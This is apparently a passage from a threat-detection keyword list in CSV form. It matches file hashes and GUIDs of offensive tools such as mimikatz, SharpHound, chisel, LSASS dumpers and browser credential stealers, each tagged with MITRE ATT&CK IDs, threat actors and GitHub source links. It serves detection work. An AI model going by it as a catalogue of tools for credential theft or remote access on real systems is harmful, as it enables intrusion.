"*33d0f399-f79a-44a2-a487-21fce657be35*",".{0,1000}33d0f399\-f79a\-44a2\-a487\-21fce657be35.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","#GUIDProject","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","24439" "*33df490ca748ef4411c8423fd6b2b9afa0c120b4faef525ddf2d39bb60001c16*",".{0,1000}33df490ca748ef4411c8423fd6b2b9afa0c120b4faef525ddf2d39bb60001c16.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","24441" "*33e7acd14174cdbc8fafe359356c3817df0aa5abded5614c6e2e77ff089e6fb2*",".{0,1000}33e7acd14174cdbc8fafe359356c3817df0aa5abded5614c6e2e77ff089e6fb2.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","24446" "*33f8a337f8226b5c4dc3ef7ded1d82973b81f9b188123e1db551c7265831b141*",".{0,1000}33f8a337f8226b5c4dc3ef7ded1d82973b81f9b188123e1db551c7265831b141.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24447" "*33ff6cd5604aa7d47c048e328546a890a4e5eb1cbbb578aeb78c41454d449212*",".{0,1000}33ff6cd5604aa7d47c048e328546a890a4e5eb1cbbb578aeb78c41454d449212.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","24448" "*3404870416355a3fb4bf2d43695606b77785e6fbf534f2f6a536861ffcc9de81*",".{0,1000}3404870416355a3fb4bf2d43695606b77785e6fbf534f2f6a536861ffcc9de81.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","24451" "*340ce55adab1112723a9947962c3557daeb2ed12fdb535f99dd8b66682356ebf*",".{0,1000}340ce55adab1112723a9947962c3557daeb2ed12fdb535f99dd8b66682356ebf.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24452" "*340ced72dda48a480d8a7d3f4e4d55af5de3f32bd61806362c04b7081bb11607*",".{0,1000}340ced72dda48a480d8a7d3f4e4d55af5de3f32bd61806362c04b7081bb11607.{0,1000}","offensive_tool_keyword","subbrute","A DNS meta-query spider that enumerates DNS records and subdomains.","T1071.001 - T1083 - T1590.001","TA0043 - TA0007?","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/TheRook/subbrute","1","0","#filehash","N/A","5","10","3422","661","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z","24453" "*340df9bf5aa4527010e535905f4e4926e70b7d6b7716491638a920c37d717a34*",".{0,1000}340df9bf5aa4527010e535905f4e4926e70b7d6b7716491638a920c37d717a34.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24454" "*340ebf838dd969bc96dde3068e57e62b30726e78bc663ef60ad6cbd7c5d8716a*",".{0,1000}340ebf838dd969bc96dde3068e57e62b30726e78bc663ef60ad6cbd7c5d8716a.{0,1000}","offensive_tool_keyword","HTTP-Shell","MultiPlatform HTTP Reverse Shell","T1573.001 - T1104 - T1205 - T1110","TA0005 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/HTTP-Shell","1","0","#filehash","N/A","10","10","231","33","2024-09-27T10:23:14Z","2023-09-05T12:01:17Z","24455" "*3422b5b6a7d4b662727baf8a4615c884a4295b71b8d0412130415b737a4cd216*",".{0,1000}3422b5b6a7d4b662727baf8a4615c884a4295b71b8d0412130415b737a4cd216.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","#filehash","N/A","10","4","323","52","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z","24457" "*3425d6a0a29537eb9bc8e98680cff7dd16280122f59ef4eb03d7a48760c053a7*",".{0,1000}3425d6a0a29537eb9bc8e98680cff7dd16280122f59ef4eb03d7a48760c053a7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24458" "*342d4b1d90f163fdbce23c4bffe2fdeecb420df0472cb44a272c2a4f604f8758*",".{0,1000}342d4b1d90f163fdbce23c4bffe2fdeecb420df0472cb44a272c2a4f604f8758.{0,1000}","offensive_tool_keyword","pysecdump","Python-based tool to dump security information from Windows systems","T1003.001 - T1081 - T1012 - T1005 - T1518.001","TA0006 - TA0007 - TA0043","N/A","Dispossessor","Credential Access","https://github.com/pentestmonkey/pysecdump","1","0","#filehash","N/A","10","3","270","49","2020-06-22T04:16:16Z","2013-01-19T18:02:26Z","24461" "*3443273660bae2e0f9feaaece977a654529e7161a2b753fddf986b0bbab1dca9*",".{0,1000}3443273660bae2e0f9feaaece977a654529e7161a2b753fddf986b0bbab1dca9.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24464" "*344b5c21c7902f2e11bb0ad052fd1a902f78656db34d17ced443717587af44c0*",".{0,1000}344b5c21c7902f2e11bb0ad052fd1a902f78656db34d17ced443717587af44c0.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - 
T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","24467" "*344d745c959810475c1d202f2348e644452905c1d58aaf404d1ae25e59e51d38*",".{0,1000}344d745c959810475c1d202f2348e644452905c1d58aaf404d1ae25e59e51d38.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","24468" "*345fc62946d3c63291d8213af4a8a757387754424cc01aa55db6334995286059*",".{0,1000}345fc62946d3c63291d8213af4a8a757387754424cc01aa55db6334995286059.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","24472" "*3461b057cfdf4259e44f40a0ad4490da3dd8ec511048f9eeac3dd224284a72d0*",".{0,1000}3461b057cfdf4259e44f40a0ad4490da3dd8ec511048f9eeac3dd224284a72d0.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","24473" 
"*3467732ca9073986794fb5faef8e37ede70e8fd22dccff7eb484d388ed5b2b14*",".{0,1000}3467732ca9073986794fb5faef8e37ede70e8fd22dccff7eb484d388ed5b2b14.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","24474" "*346f046d9956ddb6746649bd1f69d04f7df776532b191cc4bcb8f80792624f15*",".{0,1000}346f046d9956ddb6746649bd1f69d04f7df776532b191cc4bcb8f80792624f15.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","24475" "*3474e3348216b672c72d7a5c0cb32103c82ab2b5f7deb9a48a566f95361a0ac5*",".{0,1000}3474e3348216b672c72d7a5c0cb32103c82ab2b5f7deb9a48a566f95361a0ac5.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","24477" 
"*347e20ccd42d4346d9a1cb3255d77b493d3b1b52be12f72ccaa9085d6b5dd30f*",".{0,1000}347e20ccd42d4346d9a1cb3255d77b493d3b1b52be12f72ccaa9085d6b5dd30f.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/BadWindowsService","1","0","#filehash","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","24478" "*347e7990aad2244990071b8b5648aeb675a7792b742ebbc08035c80c916702a4*",".{0,1000}347e7990aad2244990071b8b5648aeb675a7792b742ebbc08035c80c916702a4.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","24479" "*34813bb9fdd3b929c12a273710e37882dc2171e4e910f2f0c82b2501ebc69143*",".{0,1000}34813bb9fdd3b929c12a273710e37882dc2171e4e910f2f0c82b2501ebc69143.{0,1000}","offensive_tool_keyword","ElusiveMice","Cobalt Strike User-Defined Reflective Loader with AV/EDR Evasion in mind","T1620 - T1055.012 - T1202","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/mgeeky/ElusiveMice","1","0","#filehash","N/A","10","5","449","78","2023-07-12T17:54:07Z","2021-08-27T19:22:20Z","24481" "*348980f606af2f76e3fb4ac9e1e66f3eb42da0091e72695942a3e97ff7977c0b*",".{0,1000}348980f606af2f76e3fb4ac9e1e66f3eb42da0091e72695942a3e97ff7977c0b.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","24484" "*349728a1f521a0584cd5da88fd781c2927a6b2b6da356d79279b695c0af987b6*",".{0,1000}349728a1f521a0584cd5da88fd781c2927a6b2b6da356d79279b695c0af987b6.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","#filehash","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","24486" "*349e1cbedb140c5fee7c464c53b2f038082db6079e79101717197cbb51d55cda*",".{0,1000}349e1cbedb140c5fee7c464c53b2f038082db6079e79101717197cbb51d55cda.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24488" "*349f76bc4ae2326df15117c4b0c20a5e8a0f3491e83e7ea15fdbd02d67e45e8e*",".{0,1000}349f76bc4ae2326df15117c4b0c20a5e8a0f3491e83e7ea15fdbd02d67e45e8e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24490" "*34a3dda90725d2179dbb2bbead3e076cf7f2f6f5d7f93ec81c371f7640b034c4*",".{0,1000}34a3dda90725d2179dbb2bbead3e076cf7f2f6f5d7f93ec81c371f7640b034c4.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","#filehash","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","24491" "*34aa130f8c55629bb00cad0d4834c274b5408cabd49579ee3d75d2cf5054ba9e*",".{0,1000}34aa130f8c55629bb00cad0d4834c274b5408cabd49579ee3d75d2cf5054ba9e.{0,1000}","offensive_tool_keyword","subbrute","A DNS meta-query spider that enumerates DNS records and subdomains.","T1071.001 - T1083 - T1590.001","TA0043 - TA0007?","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/TheRook/subbrute","1","0","#filehash","N/A","5","10","3422","661","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z","24492" "*34b1b9b6a69e55a9a8ee08e26eb932ea6e8823c4a93c2d95e0e7b33376492827*",".{0,1000}34b1b9b6a69e55a9a8ee08e26eb932ea6e8823c4a93c2d95e0e7b33376492827.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black 
Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","24495" "*34b4ac22a90064a96fcea9ff8e3f5f3bd089af9672d0e5313d3b1b8f0f0a9125*",".{0,1000}34b4ac22a90064a96fcea9ff8e3f5f3bd089af9672d0e5313d3b1b8f0f0a9125.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24496" "*34b57458547e8ecd072caffdd5f390098197f2bef7cee067b0122b2c153f4b01*",".{0,1000}34b57458547e8ecd072caffdd5f390098197f2bef7cee067b0122b2c153f4b01.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","24498" "*34b72dde693565c3427c8863bb527220a6793ecca920cfd663c900a9f0418dfe*",".{0,1000}34b72dde693565c3427c8863bb527220a6793ecca920cfd663c900a9f0418dfe.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24500" "*34c6af80ba22f690e42ed5e7cb90547ffb98d909f61d354f1aa2beae857cbdd1*",".{0,1000}34c6af80ba22f690e42ed5e7cb90547ffb98d909f61d354f1aa2beae857cbdd1.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","24502" "*34cd987d0aa614fd5280fc55f8b5988e8faf2d4b06c23571b48f49edab0f2a11*",".{0,1000}34cd987d0aa614fd5280fc55f8b5988e8faf2d4b06c23571b48f49edab0f2a11.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","24504" "*34cfee78a17d917fabf8d9a2b48fb55f8231c0b24a5f4197615d140d18eb9b2d*",".{0,1000}34cfee78a17d917fabf8d9a2b48fb55f8231c0b24a5f4197615d140d18eb9b2d.{0,1000}","offensive_tool_keyword","SharpMiniDump","Create a minidump of the LSASS process from memory","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/b4rtik/SharpMiniDump","1","0","#filehash","N/A","10","3","260","49","2022-11-02T15:47:30Z","2019-09-15T13:45:42Z","24505" 
"*34db2170c5e68bb656c1bc57c0932f4b89c10133d478e9459b36641da5a47c4e*",".{0,1000}34db2170c5e68bb656c1bc57c0932f4b89c10133d478e9459b36641da5a47c4e.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","24507" "*34ea6934d6d4eca71440e0d0f3f31fb8714d2a558d1b33394ee0ba5b8b58589f*",".{0,1000}34ea6934d6d4eca71440e0d0f3f31fb8714d2a558d1b33394ee0ba5b8b58589f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24508" "*34ee072372eb349c9e9acd137aa265eb1c3f9b4206c172b5e8deaff5b3dd90c9*",".{0,1000}34ee072372eb349c9e9acd137aa265eb1c3f9b4206c172b5e8deaff5b3dd90c9.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","24509" "*34fbf688da05fa13e0b3f8d18ae5aab81ce3865eb98908b236b8c593007adb5b*",".{0,1000}34fbf688da05fa13e0b3f8d18ae5aab81ce3865eb98908b236b8c593007adb5b.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - 
BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","24511" "*34fbf688da05fa13e0b3f8d18ae5aab81ce3865eb98908b236b8c593007adb5b*",".{0,1000}34fbf688da05fa13e0b3f8d18ae5aab81ce3865eb98908b236b8c593007adb5b.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential 
Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","24512" "*34fd5e0317fa3aa3439dd42857c889f12bda61055404058c08d8f40a3520d201*",".{0,1000}34fd5e0317fa3aa3439dd42857c889f12bda61055404058c08d8f40a3520d201.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","24513" "*350189c879eb3d936a434927b1fa41d353d2ebdbc6589e9efa29ea5e05329fe5*",".{0,1000}350189c879eb3d936a434927b1fa41d353d2ebdbc6589e9efa29ea5e05329fe5.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","24514" "*3504F678-95FA-4DB2-8437-31A927CABC16*",".{0,1000}3504F678\-95FA\-4DB2\-8437\-31A927CABC16.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense 